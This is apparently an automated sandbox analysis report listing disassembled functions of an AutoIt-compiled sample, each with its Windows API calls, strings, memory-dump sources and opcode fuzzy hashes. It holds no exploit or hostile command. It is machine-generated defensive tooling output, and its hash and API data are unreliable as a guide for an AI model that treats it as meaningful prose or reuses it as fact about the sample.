                                                                                                                            • Opcode ID: ec60b31980a52516b2b1899aeb87289e494c95dd83cbdbcd24b194d2f8010e38
                                                                                                                            • Instruction ID: 5fbdd6ae758dd5c1a8d523507febf43e1b45b9e629cf06fb769c037e422cd971
                                                                                                                            • Opcode Fuzzy Hash: ec60b31980a52516b2b1899aeb87289e494c95dd83cbdbcd24b194d2f8010e38
                                                                                                                            • Instruction Fuzzy Hash: 1002DF315083859FC714EF21C881AAFBBE5FF99358F14081DF895A72A1DB30D989DB52
                                                                                                                            Function 00F42D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42D50
                                                                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F42DDD
                                                                                                                            • GetMenuItemCount.USER32(00FA5890), ref: 00F42E66
                                                                                                                            • DeleteMenu.USER32(00FA5890,00000005,00000000,000000F5,?,?), ref: 00F42EF6
                                                                                                                            • DeleteMenu.USER32(00FA5890,00000004,00000000), ref: 00F42EFE
                                                                                                                            • DeleteMenu.USER32(00FA5890,00000006,00000000), ref: 00F42F06
                                                                                                                            • DeleteMenu.USER32(00FA5890,00000003,00000000), ref: 00F42F0E
                                                                                                                            • GetMenuItemCount.USER32(00FA5890), ref: 00F42F16
                                                                                                                            • SetMenuItemInfoW.USER32(00FA5890,00000004,00000000,00000030), ref: 00F42F4C
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F42F56
                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00F42F5F
                                                                                                                            • TrackPopupMenuEx.USER32(00FA5890,00000000,?,00000000,00000000,00000000), ref: 00F42F72
                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F42F7E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3993528054-0
                                                                                                                            • Opcode ID: 0c79d796b542746f02e1fa38107b3705c80cea9e5d1f8164ce2ee06064545679
                                                                                                                            • Instruction ID: c0c53968858d921bdc423516286fbc995e24945628e03d9c90af75228e5950eb
                                                                                                                            • Opcode Fuzzy Hash: 0c79d796b542746f02e1fa38107b3705c80cea9e5d1f8164ce2ee06064545679
                                                                                                                            • Instruction Fuzzy Hash: 8271E571A00209BAEB618F54DC45FAABF64FF04324F940236FA25AA1E1C7B55C14F7A1
                                                                                                                            Function 00F377DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            • _memset.LIBCMT ref: 00F3786B
                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F378A0
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F378BC
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F378D8
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F37902
                                                                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F3792A
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F37935
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F3793A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                            • API String ID: 1411258926-22481851
                                                                                                                            • Opcode ID: 4a06093802b8fe1f5f1e3ed637f1f9ad9508461f6fa864832c33b16a2a4b3061
                                                                                                                            • Instruction ID: 271602b34bea6bdfe3c564590a65ea8e8f6040e660c243a47e8690627f549fe0
                                                                                                                            • Opcode Fuzzy Hash: 4a06093802b8fe1f5f1e3ed637f1f9ad9508461f6fa864832c33b16a2a4b3061
                                                                                                                            • Instruction Fuzzy Hash: EF411872C1422DABDF21EBA5EC85DEDB7B8BF04360F004129E955B7161DB719D04DB90
                                                                                                                            Function 00F60E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharUpper
                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                            • API String ID: 3964851224-909552448
                                                                                                                            • Opcode ID: 3a611e52b7d6366a83b0a9366f61cbb7b1d6737eb06861a733ad7cb30170aae5
                                                                                                                            • Instruction ID: 2d3102d4bcc904b7f0721554c0d658b614544cee8a85dfccb48a8f6227cca413
                                                                                                                            • Opcode Fuzzy Hash: 3a611e52b7d6366a83b0a9366f61cbb7b1d6737eb06861a733ad7cb30170aae5
                                                                                                                            • Instruction Fuzzy Hash: 1E41793261428A8BDF21EF18DC51AEF3365EF21314F254418FC551B292DF799A1AFBA0
                                                                                                                            Function 00F3F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F1E2A0,00000010,?,Bad directive syntax error,00F6F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F3F7C2
                                                                                                                            • LoadStringW.USER32(00000000,?,00F1E2A0,00000010), ref: 00F3F7C9
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • _wprintf.LIBCMT ref: 00F3F7FC
                                                                                                                            • __swprintf.LIBCMT ref: 00F3F81E
                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F3F88D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                            • API String ID: 1506413516-4153970271
                                                                                                                            • Opcode ID: 9a21209262dd415e9170585f08f99c2358f12f4a4de009dda83fc2e6835c2e81
                                                                                                                            • Instruction ID: 4daa20bd882585c69fb167676bc853c97b950ed51f1ffdfaa62ccbbd944996bb
                                                                                                                            • Opcode Fuzzy Hash: 9a21209262dd415e9170585f08f99c2358f12f4a4de009dda83fc2e6835c2e81
                                                                                                                            • Instruction Fuzzy Hash: A6216D32D0021EEBDF11EF91CC0AEEE7779BF19310F040466F515660A2EA729668EB51
                                                                                                                            Function 00F452C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                              • Part of subcall function 00EE7924: _memmove.LIBCMT ref: 00EE79AD
                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F45330
                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F45346
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F45357
                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F45369
                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F4537A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$_memmove
                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                            • API String ID: 2279737902-1007645807
                                                                                                                            • Opcode ID: e9ee736f7fe362c27117b5fd2f7656a925924c879aa38fdec6d99bd18a0bcc96
                                                                                                                            • Instruction ID: 47176010611b33b09deb6ea5394b500b66c33886544805ba13960836c24acad2
                                                                                                                            • Opcode Fuzzy Hash: e9ee736f7fe362c27117b5fd2f7656a925924c879aa38fdec6d99bd18a0bcc96
                                                                                                                            • Instruction Fuzzy Hash: 9711B621D5015D7AEB20BBA2DC49DFFBBBCEBD6F90F000429B851A20D2DEA04D05D562
                                                                                                                            Function 00F446B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                            • String ID: 0.0.0.0
                                                                                                                            • API String ID: 208665112-3771769585
                                                                                                                            • Opcode ID: 84cc8ec1c4564aeb522fdd097ff99d937df1d0ed5a31d9b2cfa6ad453c50b9f0
                                                                                                                            • Instruction ID: 34f57d9697b318153c0fd4d5bcac6c82851e93e7d07db50877959e2a9a28a4ad
                                                                                                                            • Opcode Fuzzy Hash: 84cc8ec1c4564aeb522fdd097ff99d937df1d0ed5a31d9b2cfa6ad453c50b9f0
                                                                                                                            • Instruction Fuzzy Hash: 3211D831904119AFDB14AB30EC4AFDE7BBCEB41721F0401B6F945A6091EF74AD86B661
                                                                                                                            Function 00F44F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00F44F7A
                                                                                                                              • Part of subcall function 00F0049F: timeGetTime.WINMM(?,75C0B400,00EF0E7B), ref: 00F004A3
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00F44FA6
                                                                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F44FCA
                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F44FEC
                                                                                                                            • SetActiveWindow.USER32 ref: 00F4500B
                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F45019
                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F45038
                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00F45043
                                                                                                                            • IsWindow.USER32 ref: 00F4504F
                                                                                                                            • EndDialog.USER32(00000000), ref: 00F45060
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                            • String ID: BUTTON
                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                            • Opcode ID: 8a3852325977767c6c7385f3366f333da141b93fc69023f017a6b62a0f31be2f
                                                                                                                            • Instruction ID: 9d6791dcb61c1daf1cf8cebfc2ba70be631050d2e121e2cbafe5f5f1dbdf1284
                                                                                                                            • Opcode Fuzzy Hash: 8a3852325977767c6c7385f3366f333da141b93fc69023f017a6b62a0f31be2f
                                                                                                                            • Instruction Fuzzy Hash: 642192B4A0460DAFE7106F24FC89B263F69EF06B55F0D1024F911D22B5CBA19D58FA62
                                                                                                                            Function 00F4D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00F4D5EA
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F4D67D
                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00F4D691
                                                                                                                            • CoCreateInstance.OLE32(00F72D7C,00000000,00000001,00F98C1C,?), ref: 00F4D6DD
                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F4D74C
                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00F4D7A4
                                                                                                                            • _memset.LIBCMT ref: 00F4D7E1
                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00F4D81D
                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F4D840
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00F4D847
                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F4D87E
                                                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00F4D880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1246142700-0
                                                                                                                            • Opcode ID: cd3b1443457db6dbaefb14536dc37fe1e647b1d418e4f540075542ff81aa9bef
                                                                                                                            • Instruction ID: a8e90e29c72421a6d6be27da56697ec0136491efc798db220115addb2f8cc932
                                                                                                                            • Opcode Fuzzy Hash: cd3b1443457db6dbaefb14536dc37fe1e647b1d418e4f540075542ff81aa9bef
                                                                                                                            • Instruction Fuzzy Hash: 39B1F775A00109AFDB04DFA4C888DAEBBF9FF48314F1484A9E919EB261DB30ED45DB50
                                                                                                                            Function 00F3C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00F3C283
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F3C295
                                                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F3C2F3
                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00F3C2FE
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F3C310
                                                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F3C364
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00F3C372
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00F3C383
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F3C3C6
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00F3C3D4
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F3C3F1
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00F3C3FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3096461208-0
                                                                                                                            • Opcode ID: eed9436b27e811cf4ea5a20dffa3e3ac87415dfee632ce2562bfa5565cbf62cc
                                                                                                                            • Instruction ID: 4e23856a7c0b1194693c22c9e3562bbd39d177741b1ca43900500abf975b4518
                                                                                                                            • Opcode Fuzzy Hash: eed9436b27e811cf4ea5a20dffa3e3ac87415dfee632ce2562bfa5565cbf62cc
                                                                                                                            • Instruction Fuzzy Hash: 8D514571F00209AFDB18CFA9DD85A6EBBB5FB88720F14812DF515E7290D7B19D049B50
                                                                                                                            Function 00EE201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EE2036,?,00000000,?,?,?,?,00EE16CB,00000000,?), ref: 00EE1B9A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EE20D3
                                                                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00EE216E
                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00F1BCA6
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BCD7
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BCEE
                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EE16CB,00000000,?,?,00EE1AE2,?,?), ref: 00F1BD0A
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F1BD1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 641708696-0
                                                                                                                            • Opcode ID: ba25eec95db22194e241e90b07b937ce556368b317aa965bd0b6e37a42399513
                                                                                                                            • Instruction ID: 76716e2ba94d2aeaff5839f6f16c22c048c91c987323a55ecaf981eb4401ae12
                                                                                                                            • Opcode Fuzzy Hash: ba25eec95db22194e241e90b07b937ce556368b317aa965bd0b6e37a42399513
                                                                                                                            • Instruction Fuzzy Hash: D661CF71500A58DFCB399F16E948B69B7F5FF41726F10552CE252AA5B0C7B4A880EF80
                                                                                                                            Function 00EE21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00EE21D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorLongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259745315-0
                                                                                                                            • Opcode ID: 6f9a06f9e229521cf3d1a70bb46e1533e2ef7d58c2450b5971950f7f4f2980d8
                                                                                                                            • Instruction ID: 40851b19024a99b2518c371bdab9086b6323889a25d3a97b025f4b086374a006
                                                                                                                            • Opcode Fuzzy Hash: 6f9a06f9e229521cf3d1a70bb46e1533e2ef7d58c2450b5971950f7f4f2980d8
                                                                                                                            • Instruction Fuzzy Hash: 3D41A531400188DBDB255F29EC88BB93B69EB0A331F145269FF659A1F1C7718C41EB21
                                                                                                                            Function 00F4A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?,00F6F910), ref: 00F4A90B
                                                                                                                            • GetDriveTypeW.KERNEL32(00000061,00F989A0,00000061), ref: 00F4A9D5
                                                                                                                            • _wcscpy.LIBCMT ref: 00F4A9FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
